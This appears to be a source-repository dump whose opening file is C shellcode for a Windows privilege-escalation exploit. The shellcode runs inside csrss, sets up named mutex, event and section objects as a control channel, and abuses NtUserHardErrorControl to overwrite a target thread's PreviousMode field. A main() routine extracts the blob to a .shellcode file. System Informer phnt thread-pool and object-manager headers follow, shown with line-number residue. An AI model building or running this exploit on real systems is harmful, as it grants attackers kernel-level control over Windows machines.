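//    a mismatch turns this into a write to an arbitrary kernel address.
//  - The objects are created with a SECURITY_DESCRIPTOR that has only Revision set
//    (no owner, no DACL flags). Whatever protection the kernel assigns by default is
//    all that guards this control channel, and anyone who can open the request event
//    and the section can aim the write at any thread -- confirm the effective DACL.
//  - The loop only ends when the wait fails, so the thread and the named objects stay
//    alive in csrss for the rest of the session; nothing tears them down.
VOID CsrssShellcode( PSHELLCODE_PARAMS pParams )
{
    NTSTATUS ntStatus = STATUS_SUCCESS;
    DESKTOPUSEDESKTOP desktop = { 0, };
    HANDLE hMutex = NULL;
    HANDLE hReq = NULL;
    HANDLE hDone = NULL;
    HANDLE hSection = NULL;
    UNICODE_STRING uniStr = { 0, };
    OBJECT_ATTRIBUTES objAttr = { 0, };
    LARGE_INTEGER sectionSize = { 0, };
    PIPC_SECTION pSection = NULL;
    SIZE_T viewSize = 0;
    SECURITY_DESCRIPTOR sd = { 0, };

    // Minimal SD: revision only, no owner/group/DACL present. See the note above.
    sd.Revision = SECURITY_DESCRIPTOR_REVISION;

    // Create mutex. objAttr keeps pointing at uniStr, which is re-initialised before
    // each object below. On any setup failure we return instead of continuing: the
    // original fell through and could dereference a NULL section view inside csrss.
    // Handles created so far are leaked because there is no NtClose in the IAT.
    _RtlInitUnicodeString(&uniStr, pParams->mutexName);
    InitializeObjectAttributes(&objAttr, &uniStr, OBJ_CASE_INSENSITIVE, NULL, &sd);
    ntStatus = pParams->pNtCreateMutant(&hMutex, MUTEX_ALL_ACCESS, &objAttr, FALSE);
    if (!NT_SUCCESS(ntStatus))
    {
        int x = 0x10;
        __debugbreak();
        return;
    }

    // Create request event (EVENT_ALL_ACCESS is the mask meant for events; the
    // original passed the mutant mask here).
    _RtlInitUnicodeString(&uniStr, pParams->reqName);
    ntStatus = pParams->pNtCreateEvent(&hReq, EVENT_ALL_ACCESS, &objAttr, SynchronizationEvent, FALSE);
    if (!NT_SUCCESS(ntStatus))
    {
        int x = 0x11;
        __debugbreak();
        return;
    }

    // Create completion event
    _RtlInitUnicodeString(&uniStr, pParams->doneName);
    ntStatus = pParams->pNtCreateEvent(&hDone, EVENT_ALL_ACCESS, &objAttr, SynchronizationEvent, FALSE);
    if (!NT_SUCCESS(ntStatus))
    {
        int x = 0x12;
        __debugbreak();
        return;
    }

    // One page of shared memory holding the IPC_SECTION request/response record.
    _RtlInitUnicodeString(&uniStr, pParams->sectionName);
    sectionSize.QuadPart = 4096;
    ntStatus = pParams->pNtCreateSection(&hSection, SECTION_ALL_ACCESS, &objAttr, &sectionSize, PAGE_READWRITE, SEC_COMMIT, NULL);
    if (!NT_SUCCESS(ntStatus))
    {
        int x = 0x13;
        __debugbreak();
        return;
    }

    ntStatus = pParams->pNtMapViewOfSection(hSection, NtCurrentProcess(), (PVOID*)&pSection, 0, 4096, NULL, &viewSize, ViewUnmap, 0, PAGE_READWRITE);
    if (!NT_SUCCESS(ntStatus) || NULL == pSection)
    {
        int x = 0x14;
        __debugbreak();
        return;
    }

    // Wait for a request to come in. The mutex created above is never acquired
    // here; presumably clients use it to serialise among themselves.
    while (STATUS_WAIT_0 == pParams->pNtWaitForSingleObject(hReq, FALSE, NULL))
    {
        // Read the client-supplied target once so the value we check is the value we use.
        PVOID pThread = pSection->pThread;

        pSection->ntStatus = STATUS_PENDING;

        // desktop.Restore is treated as an output of this call that the next call
        // overwrites -- assumed from the ANGRYORCHARD sequence, confirm.
        ntStatus = pParams->pNtUserSetInformationThread(NtCurrentThread(), UserThreadUseDesktop, &desktop, sizeof(desktop));
        if (!NT_SUCCESS(ntStatus))
        {
            int x = 0x15;
            __debugbreak();
            pSection->ntStatus = ntStatus;
        }
        else if (NULL == pThread)
        {
            // Original computed STATUS_NOT_FOUND but never published it, so the
            // client saw STATUS_PENDING; report it.
            pSection->ntStatus = STATUS_NOT_FOUND;
        }
        else
        {
            // pThread is taken to be the address of the thread's OBJECT_HEADER:
            // +OBJECT_HEADER_SIZE reaches the ETHREAD body, +ETHREAD_PREVIOUSMODE_OFFSET
            // its PreviousMode field. Both constants are build-specific.
            desktop.Restore.pDeskRestore = (PUCHAR)pThread + ETHREAD_PREVIOUSMODE_OFFSET + OBJECT_HEADER_SIZE;
            ntStatus = pParams->pNtUserHardErrorControl(HardErrorDetachNoQueue, NtCurrentThread(), &desktop.Restore);
            if (!NT_SUCCESS(ntStatus))
            {
                // Original overwrote this failure with STATUS_SUCCESS a few lines later.
                int x = 0x16;
                __debugbreak();
                pSection->ntStatus = ntStatus;
            }
            else
            {
                // Set result
                pSection->ntStatus = STATUS_SUCCESS;
            }
        }

        // Consume the request either way so a stale target is never reused.
        pSection->pThread = NULL;

        // Send ACK
        (void)pParams->pNtSetEvent(hDone, NULL);
    }
}

// x64 only: TEB self pointer read from gs.
struct _TEB* CurrentTeb( VOID )
{
    return (struct _TEB*)__readgsqword(FIELD_OFFSET(NT_TIB, Self));
}

// Returns an address inside the caller's body (the return address of this call),
// which is guaranteed to lie inside the blob because the caller is part of it.
PVOID WhereAmI()
{
    return _ReturnAddress();
}

// CRT-free wcslen.
size_t _wcslen(const wchar_t* str)
{
    size_t count = 0;

    while (str[count])
    {
        count++;
    }

    return count;
}

// CRT-free RtlInitUnicodeString: Length is the byte count without the terminator,
// MaximumLength includes it (the original set both to Length). The byte count is
// computed in size_t and clamped so a long input can no longer wrap the USHORT
// fields silently.
VOID _RtlInitUnicodeString(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString
    )
{
    const size_t maxBytes = 0xFFFF - sizeof(wchar_t);   // largest Length that still leaves room for the NUL
    size_t byteLength = _wcslen(SourceString) * sizeof(wchar_t);

    if (byteLength > maxBytes)
    {
        byteLength = maxBytes;
    }

    DestinationString->Buffer = (PWSTR)SourceString;
    DestinationString->Length = (USHORT)byteLength;
    DestinationString->MaximumLength = (USHORT)(byteLength + sizeof(wchar_t));
}

// CRT-free byte comparison; TRUE when the first len bytes of a and b are equal.
BOOLEAN memeq(const UCHAR* a, const UCHAR* b, DWORD len)
{
    DWORD i = 0;

    for (i = 0; i < len; i++)
    {
        if (a[i] != b[i])
        {
            return FALSE;
        }
    }
    return TRUE;
}

// Locate the blob base by scanning backwards from our own code for the MAGIC_NOPS
// pattern stored in the parameter block. This function lives inside the blob, so the
// base is at most mySize-1 bytes below the return address; bounding the scan by
// mySize makes the NULL return reachable instead of faulting on unmapped memory.
PVOID FindMyBase(PSHELLCODE_PARAMS pParams)
{
    PUCHAR pSearch = (PUCHAR)WhereAmI();
    DWORD offset = 0;

    for (offset = 0; offset < pParams->mySize; offset++, pSearch--)
    {
        if (memeq(pSearch, pParams->magicNops, sizeof(pParams->magicNops)))
        {
            return pSearch;
        }
    }

    return NULL;
}

// Locate the SHELLCODE_PARAMS block by scanning forward from our own code for the
// MAGIC1/MAGIC2 pair. There is deliberately no upper bound: the blob size is inside
// the block being searched for. If the loader did not append a parameter block this
// faults rather than returning.
PSHELLCODE_PARAMS GetParams(VOID)
{
    PUCHAR pSearch = (PUCHAR)WhereAmI();

    for (;;)
    {
        PSHELLCODE_PARAMS pCandidate = (PSHELLCODE_PARAMS)pSearch;

        if ((MAGIC1 == pCandidate->magic1) && (MAGIC2 == pCandidate->magic2))
        {
            return pCandidate;
        }

        pSearch++;
    }
}

// End marker: everything from Shellcode up to here is dumped by main() below.
BOOL EndShellcode()
{
    return TRUE;
}

#include 

// Dump the bytes between the Shellcode and EndShellcode exports to
// "<this executable>.shellcode". Assumes the linker placed EndShellcode after
// Shellcode with every helper in between (presumably enforced by a function-order
// file -- confirm); the export order is checked so a broken layout fails loudly.
int main()
{
    WCHAR myPath[MAX_PATH] = { 0, };
    static const WCHAR suffix[] = L".shellcode";
    HMODULE hMe = GetModuleHandle(NULL);
    PUCHAR shellcodeStart = NULL;
    PUCHAR shellcodeEnd = NULL;
    SIZE_T shellcodeLength = 0;
    HANDLE hFile = INVALID_HANDLE_VALUE;    // was HMODULE in the original
    DWORD bytesWritten = 0;
    DWORD pathLength = 0;
    int rc = 1;

    if (NULL == hMe)
    {
        printf(" [!] GetModuleHandle failed with GLE %lu\n", GetLastError());
        return 1;
    }

    shellcodeStart = (PUCHAR)GetProcAddress(hMe, "Shellcode");
    shellcodeEnd = (PUCHAR)GetProcAddress(hMe, "EndShellcode");
    if (NULL == shellcodeStart || NULL == shellcodeEnd || shellcodeEnd <= shellcodeStart)
    {
        printf(" [!] Could not resolve Shellcode/EndShellcode exports, or they are out of order\n");
        return 1;
    }
    shellcodeLength = (SIZE_T)(shellcodeEnd - shellcodeStart);

    // GetModuleFileNameW returns the buffer size on truncation, which the length
    // check below also rejects. ARRAYSIZE(suffix) includes the terminator, so a
    // passing check guarantees room for suffix plus NUL; the original wcsncat count
    // left no room for the NUL on a long path.
    pathLength = GetModuleFileNameW(NULL, myPath, ARRAYSIZE(myPath));
    if (0 == pathLength || pathLength + ARRAYSIZE(suffix) > ARRAYSIZE(myPath))
    {
        printf(" [!] Module path is missing or too long to append the .shellcode suffix\n");
        return 1;
    }
    wcsncat(myPath, suffix, ARRAYSIZE(myPath) - pathLength - 1);

    hFile = CreateFileW(myPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (INVALID_HANDLE_VALUE == hFile)
    {
        printf(" [!] Failed to open output file: %ws\n", myPath);
        return 1;
    }
    if (!WriteFile(hFile, shellcodeStart, (DWORD)shellcodeLength, &bytesWritten, NULL) ||
        (bytesWritten != shellcodeLength))
    {
        printf(" [!] Failed to write shellcode with GLE %lu\n", GetLastError());
        goto cleanup;
    }

    printf(" [+] Shellcode written to output file: %ws\n", myPath);
    rc = 0;

cleanup:
    CloseHandle(hFile);
    return rc;
}
--------------------------------------------------------------------------------
/phnt/include/nttp.h:
--------------------------------------------------------------------------------
/*
 * Thread Pool support functions
 *
 * This file is part of System Informer.
 */

#ifndef _NTTP_H
#define _NTTP_H

// Some types are already defined in winnt.h.

typedef struct _TP_ALPC TP_ALPC, *PTP_ALPC;

// private
typedef VOID (NTAPI *PTP_ALPC_CALLBACK)(
    _Inout_ PTP_CALLBACK_INSTANCE Instance,
    _Inout_opt_ PVOID Context,
    _In_ PTP_ALPC Alpc
    );

// rev
typedef VOID (NTAPI *PTP_ALPC_CALLBACK_EX)(
    _Inout_ PTP_CALLBACK_INSTANCE Instance,
    _Inout_opt_ PVOID Context,
    _In_ PTP_ALPC Alpc,
    _In_ PVOID ApcContext
    );

#if (PHNT_VERSION >= PHNT_VISTA)

// private
_Check_return_
NTSYSAPI
NTSTATUS
NTAPI
TpAllocPool(
    _Out_ PTP_POOL *PoolReturn,
    _Reserved_ PVOID Reserved
    );

// winbase:CloseThreadpool
NTSYSAPI
VOID
NTAPI
TpReleasePool(
    _Inout_ PTP_POOL Pool
    );

// winbase:SetThreadpoolThreadMaximum
NTSYSAPI
VOID
NTAPI
TpSetPoolMaxThreads(
    _Inout_ PTP_POOL Pool,
    _In_ ULONG MaxThreads
    );

// private
NTSYSAPI
NTSTATUS
NTAPI
TpSetPoolMinThreads(
    _Inout_ PTP_POOL Pool,
    _In_ ULONG MinThreads
    );

#if (PHNT_VERSION >= PHNT_WIN7)
// rev
NTSYSAPI
NTSTATUS
NTAPI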
TpQueryPoolStackInformation( 73 | _In_ PTP_POOL Pool, 74 | _Out_ PTP_POOL_STACK_INFORMATION PoolStackInformation 75 | ); 76 | #endif 77 | 78 | #if (PHNT_VERSION >= PHNT_WIN7) 79 | // rev 80 | NTSYSAPI 81 | NTSTATUS 82 | NTAPI 83 | TpSetPoolStackInformation( 84 | _Inout_ PTP_POOL Pool, 85 | _In_ PTP_POOL_STACK_INFORMATION PoolStackInformation 86 | ); 87 | #endif 88 | 89 | // private 90 | _Check_return_ 91 | NTSYSAPI 92 | NTSTATUS 93 | NTAPI 94 | TpAllocCleanupGroup( 95 | _Out_ PTP_CLEANUP_GROUP *CleanupGroupReturn 96 | ); 97 | 98 | // winbase:CloseThreadpoolCleanupGroup 99 | NTSYSAPI 100 | VOID 101 | NTAPI 102 | TpReleaseCleanupGroup( 103 | _Inout_ PTP_CLEANUP_GROUP CleanupGroup 104 | ); 105 | 106 | // winbase:CloseThreadpoolCleanupGroupMembers 107 | NTSYSAPI 108 | VOID 109 | NTAPI 110 | TpReleaseCleanupGroupMembers( 111 | _Inout_ PTP_CLEANUP_GROUP CleanupGroup, 112 | _In_ LOGICAL CancelPendingCallbacks, 113 | _Inout_opt_ PVOID CleanupParameter 114 | ); 115 | 116 | // winbase:SetEventWhenCallbackReturns 117 | NTSYSAPI 118 | VOID 119 | NTAPI 120 | TpCallbackSetEventOnCompletion( 121 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 122 | _In_ HANDLE Event 123 | ); 124 | 125 | // winbase:ReleaseSemaphoreWhenCallbackReturns 126 | NTSYSAPI 127 | VOID 128 | NTAPI 129 | TpCallbackReleaseSemaphoreOnCompletion( 130 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 131 | _In_ HANDLE Semaphore, 132 | _In_ ULONG ReleaseCount 133 | ); 134 | 135 | // winbase:ReleaseMutexWhenCallbackReturns 136 | NTSYSAPI 137 | VOID 138 | NTAPI 139 | TpCallbackReleaseMutexOnCompletion( 140 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 141 | _In_ HANDLE Mutex 142 | ); 143 | 144 | // winbase:LeaveCriticalSectionWhenCallbackReturns 145 | NTSYSAPI 146 | VOID 147 | NTAPI 148 | TpCallbackLeaveCriticalSectionOnCompletion( 149 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 150 | _Inout_ PRTL_CRITICAL_SECTION CriticalSection 151 | ); 152 | 153 | // winbase:FreeLibraryWhenCallbackReturns 154 | NTSYSAPI 155 | VOID 156 | NTAPI 157 | 
TpCallbackUnloadDllOnCompletion( 158 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 159 | _In_ PVOID DllHandle 160 | ); 161 | 162 | // winbase:CallbackMayRunLong 163 | NTSYSAPI 164 | NTSTATUS 165 | NTAPI 166 | TpCallbackMayRunLong( 167 | _Inout_ PTP_CALLBACK_INSTANCE Instance 168 | ); 169 | 170 | // winbase:DisassociateCurrentThreadFromCallback 171 | NTSYSAPI 172 | VOID 173 | NTAPI 174 | TpDisassociateCallback( 175 | _Inout_ PTP_CALLBACK_INSTANCE Instance 176 | ); 177 | 178 | // winbase:TrySubmitThreadpoolCallback 179 | _Check_return_ 180 | NTSYSAPI 181 | NTSTATUS 182 | NTAPI 183 | TpSimpleTryPost( 184 | _In_ PTP_SIMPLE_CALLBACK Callback, 185 | _Inout_opt_ PVOID Context, 186 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 187 | ); 188 | 189 | // private 190 | _Check_return_ 191 | NTSYSAPI 192 | NTSTATUS 193 | NTAPI 194 | TpAllocWork( 195 | _Out_ PTP_WORK *WorkReturn, 196 | _In_ PTP_WORK_CALLBACK Callback, 197 | _Inout_opt_ PVOID Context, 198 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 199 | ); 200 | 201 | // winbase:CloseThreadpoolWork 202 | NTSYSAPI 203 | VOID 204 | NTAPI 205 | TpReleaseWork( 206 | _Inout_ PTP_WORK Work 207 | ); 208 | 209 | // winbase:SubmitThreadpoolWork 210 | NTSYSAPI 211 | VOID 212 | NTAPI 213 | TpPostWork( 214 | _Inout_ PTP_WORK Work 215 | ); 216 | 217 | // winbase:WaitForThreadpoolWorkCallbacks 218 | NTSYSAPI 219 | VOID 220 | NTAPI 221 | TpWaitForWork( 222 | _Inout_ PTP_WORK Work, 223 | _In_ LOGICAL CancelPendingCallbacks 224 | ); 225 | 226 | // private 227 | _Check_return_ 228 | NTSYSAPI 229 | NTSTATUS 230 | NTAPI 231 | TpAllocTimer( 232 | _Out_ PTP_TIMER *Timer, 233 | _In_ PTP_TIMER_CALLBACK Callback, 234 | _Inout_opt_ PVOID Context, 235 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 236 | ); 237 | 238 | // winbase:CloseThreadpoolTimer 239 | NTSYSAPI 240 | VOID 241 | NTAPI 242 | TpReleaseTimer( 243 | _Inout_ PTP_TIMER Timer 244 | ); 245 | 246 | // winbase:SetThreadpoolTimer 247 | NTSYSAPI 248 | VOID 249 | NTAPI 250 | TpSetTimer( 251 | 
_Inout_ PTP_TIMER Timer, 252 | _In_opt_ PLARGE_INTEGER DueTime, 253 | _In_ ULONG Period, 254 | _In_opt_ ULONG WindowLength 255 | ); 256 | 257 | #if (PHNT_VERSION >= PHNT_WIN8) 258 | // winbase:SetThreadpoolTimerEx 259 | NTSYSAPI 260 | NTSTATUS 261 | NTAPI 262 | TpSetTimerEx( 263 | _Inout_ PTP_TIMER Timer, 264 | _In_opt_ PLARGE_INTEGER DueTime, 265 | _In_ ULONG Period, 266 | _In_opt_ ULONG WindowLength 267 | ); 268 | #endif 269 | 270 | // winbase:IsThreadpoolTimerSet 271 | NTSYSAPI 272 | LOGICAL 273 | NTAPI 274 | TpIsTimerSet( 275 | _In_ PTP_TIMER Timer 276 | ); 277 | 278 | // winbase:WaitForThreadpoolTimerCallbacks 279 | NTSYSAPI 280 | VOID 281 | NTAPI 282 | TpWaitForTimer( 283 | _Inout_ PTP_TIMER Timer, 284 | _In_ LOGICAL CancelPendingCallbacks 285 | ); 286 | 287 | // private 288 | _Check_return_ 289 | NTSYSAPI 290 | NTSTATUS 291 | NTAPI 292 | TpAllocWait( 293 | _Out_ PTP_WAIT *WaitReturn, 294 | _In_ PTP_WAIT_CALLBACK Callback, 295 | _Inout_opt_ PVOID Context, 296 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 297 | ); 298 | 299 | // winbase:CloseThreadpoolWait 300 | NTSYSAPI 301 | VOID 302 | NTAPI 303 | TpReleaseWait( 304 | _Inout_ PTP_WAIT Wait 305 | ); 306 | 307 | // winbase:SetThreadpoolWait 308 | NTSYSAPI 309 | VOID 310 | NTAPI 311 | TpSetWait( 312 | _Inout_ PTP_WAIT Wait, 313 | _In_opt_ HANDLE Handle, 314 | _In_opt_ PLARGE_INTEGER Timeout 315 | ); 316 | 317 | #if (PHNT_VERSION >= PHNT_WIN8) 318 | // winbase:SetThreadpoolWaitEx 319 | NTSYSAPI 320 | NTSTATUS 321 | NTAPI 322 | TpSetWaitEx( 323 | _Inout_ PTP_WAIT Wait, 324 | _In_opt_ HANDLE Handle, 325 | _In_opt_ PLARGE_INTEGER Timeout, 326 | _In_opt_ PVOID Reserved 327 | ); 328 | #endif 329 | 330 | // winbase:WaitForThreadpoolWaitCallbacks 331 | NTSYSAPI 332 | VOID 333 | NTAPI 334 | TpWaitForWait( 335 | _Inout_ PTP_WAIT Wait, 336 | _In_ LOGICAL CancelPendingCallbacks 337 | ); 338 | 339 | // private 340 | typedef VOID (NTAPI *PTP_IO_CALLBACK)( 341 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 342 | _Inout_opt_ 
PVOID Context, 343 | _In_ PVOID ApcContext, 344 | _In_ PIO_STATUS_BLOCK IoSB, 345 | _In_ PTP_IO Io 346 | ); 347 | 348 | // private 349 | _Check_return_ 350 | NTSYSAPI 351 | NTSTATUS 352 | NTAPI 353 | TpAllocIoCompletion( 354 | _Out_ PTP_IO *IoReturn, 355 | _In_ HANDLE File, 356 | _In_ PTP_IO_CALLBACK Callback, 357 | _Inout_opt_ PVOID Context, 358 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 359 | ); 360 | 361 | // winbase:CloseThreadpoolIo 362 | NTSYSAPI 363 | VOID 364 | NTAPI 365 | TpReleaseIoCompletion( 366 | _Inout_ PTP_IO Io 367 | ); 368 | 369 | // winbase:StartThreadpoolIo 370 | NTSYSAPI 371 | VOID 372 | NTAPI 373 | TpStartAsyncIoOperation( 374 | _Inout_ PTP_IO Io 375 | ); 376 | 377 | // winbase:CancelThreadpoolIo 378 | NTSYSAPI 379 | VOID 380 | NTAPI 381 | TpCancelAsyncIoOperation( 382 | _Inout_ PTP_IO Io 383 | ); 384 | 385 | // winbase:WaitForThreadpoolIoCallbacks 386 | NTSYSAPI 387 | VOID 388 | NTAPI 389 | TpWaitForIoCompletion( 390 | _Inout_ PTP_IO Io, 391 | _In_ LOGICAL CancelPendingCallbacks 392 | ); 393 | 394 | // private 395 | NTSYSAPI 396 | NTSTATUS 397 | NTAPI 398 | TpAllocAlpcCompletion( 399 | _Out_ PTP_ALPC *AlpcReturn, 400 | _In_ HANDLE AlpcPort, 401 | _In_ PTP_ALPC_CALLBACK Callback, 402 | _Inout_opt_ PVOID Context, 403 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 404 | ); 405 | 406 | #if (PHNT_VERSION >= PHNT_WIN7) 407 | // rev 408 | NTSYSAPI 409 | NTSTATUS 410 | NTAPI 411 | TpAllocAlpcCompletionEx( 412 | _Out_ PTP_ALPC *AlpcReturn, 413 | _In_ HANDLE AlpcPort, 414 | _In_ PTP_ALPC_CALLBACK_EX Callback, 415 | _Inout_opt_ PVOID Context, 416 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 417 | ); 418 | #endif 419 | 420 | // private 421 | NTSYSAPI 422 | VOID 423 | NTAPI 424 | TpReleaseAlpcCompletion( 425 | _Inout_ PTP_ALPC Alpc 426 | ); 427 | 428 | // private 429 | NTSYSAPI 430 | VOID 431 | NTAPI 432 | TpWaitForAlpcCompletion( 433 | _Inout_ PTP_ALPC Alpc 434 | ); 435 | 436 | // private 437 | typedef enum _TP_TRACE_TYPE 438 | { 439 | 
TpTraceThreadPriority = 1, 440 | TpTraceThreadAffinity, 441 | MaxTpTraceType 442 | } TP_TRACE_TYPE; 443 | 444 | // private 445 | NTSYSAPI 446 | VOID 447 | NTAPI 448 | TpCaptureCaller( 449 | _In_ TP_TRACE_TYPE Type 450 | ); 451 | 452 | // private 453 | NTSYSAPI 454 | VOID 455 | NTAPI 456 | TpCheckTerminateWorker( 457 | _In_ HANDLE Thread 458 | ); 459 | 460 | #endif 461 | 462 | #endif 463 | -------------------------------------------------------------------------------- /phnt/include/ntobapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Object Manager support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTOBAPI_H 8 | #define _NTOBAPI_H 9 | 10 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 11 | #define OBJECT_TYPE_CREATE 0x0001 12 | #define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 13 | #endif 14 | 15 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 16 | #define DIRECTORY_QUERY 0x0001 17 | #define DIRECTORY_TRAVERSE 0x0002 18 | #define DIRECTORY_CREATE_OBJECT 0x0004 19 | #define DIRECTORY_CREATE_SUBDIRECTORY 0x0008 20 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xf) 21 | #endif 22 | 23 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 24 | #define SYMBOLIC_LINK_QUERY 0x0001 25 | #define SYMBOLIC_LINK_SET 0x0002 26 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 27 | #define SYMBOLIC_LINK_ALL_ACCESS_EX (STANDARD_RIGHTS_REQUIRED | 0xFFFF) 28 | #endif 29 | 30 | #ifndef OBJ_PROTECT_CLOSE 31 | #define OBJ_PROTECT_CLOSE 0x00000001 32 | #endif 33 | #ifndef OBJ_INHERIT 34 | #define OBJ_INHERIT 0x00000002 35 | #endif 36 | #ifndef OBJ_AUDIT_OBJECT_CLOSE 37 | #define OBJ_AUDIT_OBJECT_CLOSE 0x00000004 38 | #endif 39 | 40 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 41 | typedef enum _OBJECT_INFORMATION_CLASS 42 | { 43 | ObjectBasicInformation, // q: OBJECT_BASIC_INFORMATION 44 | ObjectNameInformation, // q: OBJECT_NAME_INFORMATION 45 | ObjectTypeInformation, // q: 
OBJECT_TYPE_INFORMATION 46 | ObjectTypesInformation, // q: OBJECT_TYPES_INFORMATION 47 | ObjectHandleFlagInformation, // qs: OBJECT_HANDLE_FLAG_INFORMATION 48 | ObjectSessionInformation, // s: void // change object session // (requires SeTcbPrivilege) 49 | ObjectSessionObjectInformation, // s: void // change object session // (requires SeTcbPrivilege) 50 | MaxObjectInfoClass 51 | } OBJECT_INFORMATION_CLASS; 52 | #else 53 | #define ObjectBasicInformation 0 54 | #define ObjectNameInformation 1 55 | #define ObjectTypeInformation 2 56 | #define ObjectTypesInformation 3 57 | #define ObjectHandleFlagInformation 4 58 | #define ObjectSessionInformation 5 59 | #define ObjectSessionObjectInformation 6 60 | #endif 61 | 62 | typedef struct _OBJECT_BASIC_INFORMATION 63 | { 64 | ULONG Attributes; 65 | ACCESS_MASK GrantedAccess; 66 | ULONG HandleCount; 67 | ULONG PointerCount; 68 | ULONG PagedPoolCharge; 69 | ULONG NonPagedPoolCharge; 70 | ULONG Reserved[3]; 71 | ULONG NameInfoSize; 72 | ULONG TypeInfoSize; 73 | ULONG SecurityDescriptorSize; 74 | LARGE_INTEGER CreationTime; 75 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; 76 | 77 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 78 | typedef struct _OBJECT_NAME_INFORMATION 79 | { 80 | UNICODE_STRING Name; 81 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; 82 | #endif 83 | 84 | typedef struct _OBJECT_TYPE_INFORMATION 85 | { 86 | UNICODE_STRING TypeName; 87 | ULONG TotalNumberOfObjects; 88 | ULONG TotalNumberOfHandles; 89 | ULONG TotalPagedPoolUsage; 90 | ULONG TotalNonPagedPoolUsage; 91 | ULONG TotalNamePoolUsage; 92 | ULONG TotalHandleTableUsage; 93 | ULONG HighWaterNumberOfObjects; 94 | ULONG HighWaterNumberOfHandles; 95 | ULONG HighWaterPagedPoolUsage; 96 | ULONG HighWaterNonPagedPoolUsage; 97 | ULONG HighWaterNamePoolUsage; 98 | ULONG HighWaterHandleTableUsage; 99 | ULONG InvalidAttributes; 100 | GENERIC_MAPPING GenericMapping; 101 | ULONG ValidAccessMask; 102 | BOOLEAN SecurityRequired; 103 | BOOLEAN 
MaintainHandleCount; 104 | UCHAR TypeIndex; // since WINBLUE 105 | CHAR ReservedByte; 106 | ULONG PoolType; 107 | ULONG DefaultPagedPoolCharge; 108 | ULONG DefaultNonPagedPoolCharge; 109 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; 110 | 111 | typedef struct _OBJECT_TYPES_INFORMATION 112 | { 113 | ULONG NumberOfTypes; 114 | } OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION; 115 | 116 | typedef struct _OBJECT_HANDLE_FLAG_INFORMATION 117 | { 118 | BOOLEAN Inherit; 119 | BOOLEAN ProtectFromClose; 120 | } OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; 121 | 122 | // Objects, handles 123 | 124 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 125 | 126 | NTSYSCALLAPI 127 | NTSTATUS 128 | NTAPI 129 | NtQueryObject( 130 | _In_opt_ HANDLE Handle, 131 | _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, 132 | _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation, 133 | _In_ ULONG ObjectInformationLength, 134 | _Out_opt_ PULONG ReturnLength 135 | ); 136 | 137 | NTSYSCALLAPI 138 | NTSTATUS 139 | NTAPI 140 | NtSetInformationObject( 141 | _In_ HANDLE Handle, 142 | _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, 143 | _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation, 144 | _In_ ULONG ObjectInformationLength 145 | ); 146 | 147 | #define DUPLICATE_CLOSE_SOURCE 0x00000001 148 | #define DUPLICATE_SAME_ACCESS 0x00000002 149 | #define DUPLICATE_SAME_ATTRIBUTES 0x00000004 150 | 151 | NTSYSCALLAPI 152 | NTSTATUS 153 | NTAPI 154 | NtDuplicateObject( 155 | _In_ HANDLE SourceProcessHandle, 156 | _In_ HANDLE SourceHandle, 157 | _In_opt_ HANDLE TargetProcessHandle, 158 | _Out_opt_ PHANDLE TargetHandle, 159 | _In_ ACCESS_MASK DesiredAccess, 160 | _In_ ULONG HandleAttributes, 161 | _In_ ULONG Options 162 | ); 163 | 164 | NTSYSCALLAPI 165 | NTSTATUS 166 | NTAPI 167 | NtMakeTemporaryObject( 168 | _In_ HANDLE Handle 169 | ); 170 | 171 | NTSYSCALLAPI 172 | NTSTATUS 173 | NTAPI 174 | NtMakePermanentObject( 175 | _In_ HANDLE Handle 
